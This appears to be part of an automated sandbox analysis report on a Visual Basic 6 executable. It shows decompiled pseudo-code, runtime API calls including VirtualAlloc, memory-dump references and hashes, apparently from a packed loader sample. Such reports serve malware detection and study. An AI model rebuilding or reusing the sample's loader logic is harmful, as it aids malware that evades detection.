                  • Opcode Fuzzy Hash: f0421826c4cc453be7f089f7ee2a9335aab88a91ca71e4829f0ef4cc594867cf
                  • Instruction Fuzzy Hash: 07F2E27190022CDFDB21DF90CC49BDDBBB4AB08304F1045EAE549BB2A1CBB95AC59F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E0040EAC8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a52) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* _v36;
                  				void* _v52;
                  				void* _v56;
                  				char _v60;
                  				char _v64;
                  				char _v80;
                  				intOrPtr* _v84;
                  				signed int _v88;
                  				intOrPtr* _v96;
                  				signed int _v100;
                  				char* _t39;
                  				signed int _t43;
                  				char* _t44;
                  				char* _t46;
                  				intOrPtr _t66;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t66;
                  				_push(0x50);
                  				L004012A0();
                  				_v12 = _t66;
                  				_v8 = 0x401250;
                  				L004013E4();
                  				L004013E4();
                  				if( *0x410010 != 0) {
                  					_v96 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v96 = 0x410010;
                  				}
                  				_t39 =  &_v60;
                  				L004013CC();
                  				_v84 = _t39;
                  				_t43 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v64, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x310))( *_v96));
                  				asm("fclex");
                  				_v88 = _t43;
                  				if(_v88 >= 0) {
                  					_v100 = _v100 & 0x00000000;
                  				} else {
                  					_push(0x120);
                  					_push(0x40b06c);
                  					_push(_v84);
                  					_push(_v88);
                  					L004013D8();
                  					_v100 = _t43;
                  				}
                  				_push(0);
                  				_push(0);
                  				_push(_v64);
                  				_t44 =  &_v80;
                  				_push(_t44); // executed
                  				L004013BA(); // executed
                  				_push(_t44);
                  				L0040142C();
                  				L0040145C();
                  				_push(_t44);
                  				_push(L"Koinciderede4");
                  				_push(L"Sequences");
                  				_push(L"TANKRENSNING"); // executed
                  				L0040134E(); // executed
                  				L00401462();
                  				_push( &_v64);
                  				_t46 =  &_v60;
                  				_push(_t46);
                  				_push(2);
                  				L004013C6();
                  				L00401450();
                  				_push(E0040EC23);
                  				L00401450();
                  				L00401450();
                  				return _t46;
                  			}




















                  0x0040eacd
                  0x0040ead8
                  0x0040ead9
                  0x0040eae0
                  0x0040eae3
                  0x0040eaeb
                  0x0040eaee
                  0x0040eafb
                  0x0040eb06
                  0x0040eb12
                  0x0040eb2c
                  0x0040eb14
                  0x0040eb14
                  0x0040eb19
                  0x0040eb1e
                  0x0040eb23
                  0x0040eb23
                  0x0040eb47
                  0x0040eb4b
                  0x0040eb50
                  0x0040eb5f
                  0x0040eb65
                  0x0040eb67
                  0x0040eb6e
                  0x0040eb8a
                  0x0040eb70
                  0x0040eb70
                  0x0040eb75
                  0x0040eb7a
                  0x0040eb7d
                  0x0040eb80
                  0x0040eb85
                  0x0040eb85
                  0x0040eb8e
                  0x0040eb90
                  0x0040eb92
                  0x0040eb95
                  0x0040eb98
                  0x0040eb99
                  0x0040eba1
                  0x0040eba2
                  0x0040ebac
                  0x0040ebb1
                  0x0040ebb2
                  0x0040ebb7
                  0x0040ebbc
                  0x0040ebc1
                  0x0040ebc9
                  0x0040ebd1
                  0x0040ebd2
                  0x0040ebd5
                  0x0040ebd6
                  0x0040ebd8
                  0x0040ebe3
                  0x0040ebe8
                  0x0040ec15
                  0x0040ec1d
                  0x0040ec22

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EAE3
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EAFB
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EB06
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,004012A6), ref: 0040EB1E
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB4B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000120), ref: 0040EB80
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EB99
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040EBA2
                  • __vbaStrMove.MSVBVM60(00000000), ref: 0040EBAC
                  • #690.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBC1
                  • __vbaFreeStr.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBC9
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBD8
                  • __vbaFreeVar.MSVBVM60(Koinciderede4,00000000,00000000), ref: 0040EBE3
                  • __vbaFreeVar.MSVBVM60(0040EC23,Koinciderede4,00000000,00000000), ref: 0040EC15
                  • __vbaFreeVar.MSVBVM60(0040EC23,Koinciderede4,00000000,00000000), ref: 0040EC1D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Move$#690CallCheckChkstkHresultLateListNew2
                  • String ID: #@$Koinciderede4$Pt$Sequences$TANKRENSNING
                  • API String ID: 1502117440-711310471
                  • Opcode ID: d91bb43516a79fdcc507c8fb27501a93ff8bdf53125687ec41201fcb527df2da
                  • Instruction ID: a0b683229fda30ca98858b9c9b412ab390ded157babe93e24d9ed812827dbb20
                  • Opcode Fuzzy Hash: d91bb43516a79fdcc507c8fb27501a93ff8bdf53125687ec41201fcb527df2da
                  • Instruction Fuzzy Hash: B331E971900208ABDB04EBD1DC46FDDBBB8FF08708F50453AF502BA1E2DBB969558B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: #100
                  • String ID: VB5!6&*
                  • API String ID: 1341478452-3593831657
                  • Opcode ID: 459b37422cbfca2d052bd3719bbde016be65f4a00d9d1159754ac0d9a3da5345
                  • Instruction ID: 395847132b0c30adca150897e652c8d26356471fa49975a112cf7dc192435249
                  • Opcode Fuzzy Hash: 459b37422cbfca2d052bd3719bbde016be65f4a00d9d1159754ac0d9a3da5345
                  • Instruction Fuzzy Hash: 72D0AE1155E7D20FD70316751D215856F705A5365831B08EBA4C1EA4E3C05C484AC377
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: e0f64a72f42f6e4d3f77dbb2774518b281ccdb5adb6cb381d7257e0e875ad839
                  • Instruction ID: eaa86b7c1b4a9e34241aa81295ff1d3b5e9636d60d8a3e5cd2c5c937a5fe33d4
                  • Opcode Fuzzy Hash: e0f64a72f42f6e4d3f77dbb2774518b281ccdb5adb6cb381d7257e0e875ad839
                  • Instruction Fuzzy Hash: CD312591A1DA04D9D6573921C5912B05E48FAA3393374EF7B84A37A1F1353E0F8724CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 659580b46ce1ecb54381b449aca7643406b02b5d0c0c6d4c50f8e15e91a0146d
                  • Instruction ID: 8196bf07988cbb31726b2ef9135d1aa3b73a63253cabc9e3a70d381c49224e9e
                  • Opcode Fuzzy Hash: 659580b46ce1ecb54381b449aca7643406b02b5d0c0c6d4c50f8e15e91a0146d
                  • Instruction Fuzzy Hash: 74213891A2DB04D9D6573E21C5912B05E48FAA3393374EF6B84A37A1F1353E0E8324CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 94e4827dea38c6544adcd4436288d94716ac0dee5ced40ea1584c227eb6727f0
                  • Instruction ID: 575f291398b55b8eb4d00c2eabd101a17c1628979e12b5ae335188185cc6dd01
                  • Opcode Fuzzy Hash: 94e4827dea38c6544adcd4436288d94716ac0dee5ced40ea1584c227eb6727f0
                  • Instruction Fuzzy Hash: D7210691A1DB04D9D6573D20C5812B06E48FAA3393374AFAB84A77A1F1353E0E8325CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 6d0da37a347f86074a2bba3ed384ecf50f98f9dfa72460174b39342e58678664
                  • Instruction ID: 45a56ee92838250897ca94ad2870e8313a3e834647a2d40765de4ad7e5f3882c
                  • Opcode Fuzzy Hash: 6d0da37a347f86074a2bba3ed384ecf50f98f9dfa72460174b39342e58678664
                  • Instruction Fuzzy Hash: 7E21089192D704C9D6573E31C5912B06E48FAA3387374AFBB84A77A1F1353E0E8325CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                  • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                  • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                  • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0040DB92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a20) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v40;
                  				void* _v44;
                  				intOrPtr _v56;
                  				char _v68;
                  				char _v76;
                  				signed int _v80;
                  				signed int _v92;
                  				signed int _v96;
                  				signed int _v100;
                  				signed int _v104;
                  				signed int _v108;
                  				signed int _v112;
                  				signed int _v116;
                  				signed int _v120;
                  				signed int _v124;
                  				signed int _v128;
                  				signed int _v132;
                  				signed int _v136;
                  				signed int _v140;
                  				signed int _v144;
                  				signed int _v148;
                  				signed int _v152;
                  				signed int _v156;
                  				signed int _v160;
                  				signed int _v164;
                  				signed int _v168;
                  				signed int _v172;
                  				signed int _v176;
                  				signed int _v180;
                  				signed int _v184;
                  				signed int _v188;
                  				signed int _v192;
                  				signed int _v196;
                  				signed int _v200;
                  				signed int _v204;
                  				char _t226;
                  				char* _t228;
                  				void* _t325;
                  				void* _t327;
                  				intOrPtr _t328;
                  
                  				_t328 = _t327 - 0xc;
                  				 *[fs:0x0] = _t328;
                  				L004012A0();
                  				_v16 = _t328;
                  				_v12 = 0x4011d8;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t325);
                  				L00401420();
                  				L004013E4();
                  				_push(0x11);
                  				_push(0x40b0e0);
                  				_t226 =  &_v68;
                  				_push(_t226);
                  				L004013A2();
                  				_v80 = _v80 & 0x00000000;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v92 = _t226;
                  				} else {
                  					_v92 = _v92 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 1;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v96 = _t226;
                  				} else {
                  					_v96 = _v96 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 2;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v100 = _t226;
                  				} else {
                  					_v100 = _v100 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 3;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v104 = _t226;
                  				} else {
                  					_v104 = _v104 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 4;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v108 = _t226;
                  				} else {
                  					_v108 = _v108 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 5;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v112 = _t226;
                  				} else {
                  					_v112 = _v112 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 6;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v116 = _t226;
                  				} else {
                  					_v116 = _v116 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 7;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v120 = _t226;
                  				} else {
                  					_v120 = _v120 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 8;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v124 = _t226;
                  				} else {
                  					_v124 = _v124 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 9;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v128 = _t226;
                  				} else {
                  					_v128 = _v128 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xa;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v132 = _t226;
                  				} else {
                  					_v132 = _v132 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xb;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v136 = _t226;
                  				} else {
                  					_v136 = _v136 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xc;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v140 = _t226;
                  				} else {
                  					_v140 = _v140 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xd;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v144 = _t226;
                  				} else {
                  					_v144 = _v144 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xe;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v148 = _t226;
                  				} else {
                  					_v148 = _v148 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xf;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v152 = _t226;
                  				} else {
                  					_v152 = _v152 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x10;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v156 = _t226;
                  				} else {
                  					_v156 = _v156 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x11;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v160 = _t226;
                  				} else {
                  					_v160 = _v160 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x12;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v164 = _t226;
                  				} else {
                  					_v164 = _v164 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x13;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v168 = _t226;
                  				} else {
                  					_v168 = _v168 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x14;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v172 = _t226;
                  				} else {
                  					_v172 = _v172 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x15;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v176 = _t226;
                  				} else {
                  					_v176 = _v176 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x16;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v180 = _t226;
                  				} else {
                  					_v180 = _v180 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x17;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v184 = _t226;
                  				} else {
                  					_v184 = _v184 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x18;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v188 = _t226;
                  				} else {
                  					_v188 = _v188 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x19;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v192 = _t226;
                  				} else {
                  					_v192 = _v192 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1a;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v196 = _t226;
                  				} else {
                  					_v196 = _v196 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1b;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v200 = _t226;
                  				} else {
                  					_v200 = _v200 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1c;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v204 = _t226;
                  				} else {
                  					_v204 = _v204 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_push(E0040E186);
                  				L00401450();
                  				L00401462();
                  				_v76 =  &_v68;
                  				_t228 =  &_v76;
                  				_push(_t228);
                  				_push(0);
                  				L00401390();
                  				return _t228;
                  			}














































                  0x0040db95
                  0x0040dba4
                  0x0040dbb0
                  0x0040dbb8
                  0x0040dbbb
                  0x0040dbc2
                  0x0040dbd1
                  0x0040dbda
                  0x0040dbe5
                  0x0040dbea
                  0x0040dbec
                  0x0040dbf1
                  0x0040dbf4
                  0x0040dbf5
                  0x0040dbfa
                  0x0040dc02
                  0x0040dc0a
                  0x0040dc0f
                  0x0040dc04
                  0x0040dc04
                  0x0040dc04
                  0x0040dc16
                  0x0040dc21
                  0x0040dc23
                  0x0040dc2e
                  0x0040dc36
                  0x0040dc3b
                  0x0040dc30
                  0x0040dc30
                  0x0040dc30
                  0x0040dc42
                  0x0040dc4d
                  0x0040dc4f
                  0x0040dc5a
                  0x0040dc62
                  0x0040dc67
                  0x0040dc5c
                  0x0040dc5c
                  0x0040dc5c
                  0x0040dc6e
                  0x0040dc79
                  0x0040dc7b
                  0x0040dc86
                  0x0040dc8e
                  0x0040dc93
                  0x0040dc88
                  0x0040dc88
                  0x0040dc88
                  0x0040dc9a
                  0x0040dca5
                  0x0040dca7
                  0x0040dcb2
                  0x0040dcba
                  0x0040dcbf
                  0x0040dcb4
                  0x0040dcb4
                  0x0040dcb4
                  0x0040dcc6
                  0x0040dcd1
                  0x0040dcd3
                  0x0040dcde
                  0x0040dce6
                  0x0040dceb
                  0x0040dce0
                  0x0040dce0
                  0x0040dce0
                  0x0040dcf2
                  0x0040dcfd
                  0x0040dcff
                  0x0040dd0a
                  0x0040dd12
                  0x0040dd17
                  0x0040dd0c
                  0x0040dd0c
                  0x0040dd0c
                  0x0040dd1e
                  0x0040dd29
                  0x0040dd2b
                  0x0040dd36
                  0x0040dd3e
                  0x0040dd43
                  0x0040dd38
                  0x0040dd38
                  0x0040dd38
                  0x0040dd4a
                  0x0040dd55
                  0x0040dd57
                  0x0040dd62
                  0x0040dd6a
                  0x0040dd6f
                  0x0040dd64
                  0x0040dd64
                  0x0040dd64
                  0x0040dd76
                  0x0040dd81
                  0x0040dd83
                  0x0040dd8e
                  0x0040dd96
                  0x0040dd9b
                  0x0040dd90
                  0x0040dd90
                  0x0040dd90
                  0x0040dda2
                  0x0040ddad
                  0x0040ddaf
                  0x0040ddba
                  0x0040ddc2
                  0x0040ddc7
                  0x0040ddbc
                  0x0040ddbc
                  0x0040ddbc
                  0x0040ddce
                  0x0040ddd9
                  0x0040dddb
                  0x0040dde6
                  0x0040ddf1
                  0x0040ddf6
                  0x0040dde8
                  0x0040dde8
                  0x0040dde8
                  0x0040de00
                  0x0040de0b
                  0x0040de0d
                  0x0040de18
                  0x0040de23
                  0x0040de28
                  0x0040de1a
                  0x0040de1a
                  0x0040de1a
                  0x0040de32
                  0x0040de3d
                  0x0040de3f
                  0x0040de4a
                  0x0040de55
                  0x0040de5a
                  0x0040de4c
                  0x0040de4c
                  0x0040de4c
                  0x0040de64
                  0x0040de6f
                  0x0040de71
                  0x0040de7c
                  0x0040de87
                  0x0040de8c
                  0x0040de7e
                  0x0040de7e
                  0x0040de7e
                  0x0040de96
                  0x0040dea1
                  0x0040dea3
                  0x0040deae
                  0x0040deb9
                  0x0040debe
                  0x0040deb0
                  0x0040deb0
                  0x0040deb0
                  0x0040dec8
                  0x0040ded3
                  0x0040ded5
                  0x0040dee0
                  0x0040deeb
                  0x0040def0
                  0x0040dee2
                  0x0040dee2
                  0x0040dee2
                  0x0040defa
                  0x0040df05
                  0x0040df07
                  0x0040df12
                  0x0040df1d
                  0x0040df22
                  0x0040df14
                  0x0040df14
                  0x0040df14
                  0x0040df2c
                  0x0040df37
                  0x0040df39
                  0x0040df44
                  0x0040df4f
                  0x0040df54
                  0x0040df46
                  0x0040df46
                  0x0040df46
                  0x0040df5e
                  0x0040df69
                  0x0040df6b
                  0x0040df76
                  0x0040df81
                  0x0040df86
                  0x0040df78
                  0x0040df78
                  0x0040df78
                  0x0040df90
                  0x0040df9b
                  0x0040df9d
                  0x0040dfa8
                  0x0040dfb3
                  0x0040dfb8
                  0x0040dfaa
                  0x0040dfaa
                  0x0040dfaa
                  0x0040dfc2
                  0x0040dfcd
                  0x0040dfcf
                  0x0040dfda
                  0x0040dfe5
                  0x0040dfea
                  0x0040dfdc
                  0x0040dfdc
                  0x0040dfdc
                  0x0040dff4
                  0x0040dfff
                  0x0040e001
                  0x0040e00c
                  0x0040e017
                  0x0040e01c
                  0x0040e00e
                  0x0040e00e
                  0x0040e00e
                  0x0040e026
                  0x0040e031
                  0x0040e033
                  0x0040e03e
                  0x0040e049
                  0x0040e04e
                  0x0040e040
                  0x0040e040
                  0x0040e040
                  0x0040e058
                  0x0040e063
                  0x0040e065
                  0x0040e070
                  0x0040e07b
                  0x0040e080
                  0x0040e072
                  0x0040e072
                  0x0040e072
                  0x0040e08a
                  0x0040e095
                  0x0040e097
                  0x0040e0a2
                  0x0040e0ad
                  0x0040e0b2
                  0x0040e0a4
                  0x0040e0a4
                  0x0040e0a4
                  0x0040e0bc
                  0x0040e0c7
                  0x0040e0c9
                  0x0040e0d4
                  0x0040e0df
                  0x0040e0e4
                  0x0040e0d6
                  0x0040e0d6
                  0x0040e0d6
                  0x0040e0ee
                  0x0040e0f9
                  0x0040e0fb
                  0x0040e106
                  0x0040e111
                  0x0040e116
                  0x0040e108
                  0x0040e108
                  0x0040e108
                  0x0040e120
                  0x0040e12b
                  0x0040e12d
                  0x0040e138
                  0x0040e143
                  0x0040e148
                  0x0040e13a
                  0x0040e13a
                  0x0040e13a
                  0x0040e152
                  0x0040e15d
                  0x0040e15f
                  0x0040e167
                  0x0040e16f
                  0x0040e177
                  0x0040e17a
                  0x0040e17d
                  0x0040e17e
                  0x0040e180
                  0x0040e185

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040DBB0
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040DBDA
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040DBE5
                  • __vbaAryConstruct2.MSVBVM60(?,0040B0E0,00000011,?,?,?,?,004012A6), ref: 0040DBF5
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC0A
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC16
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC36
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC42
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC62
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC6E
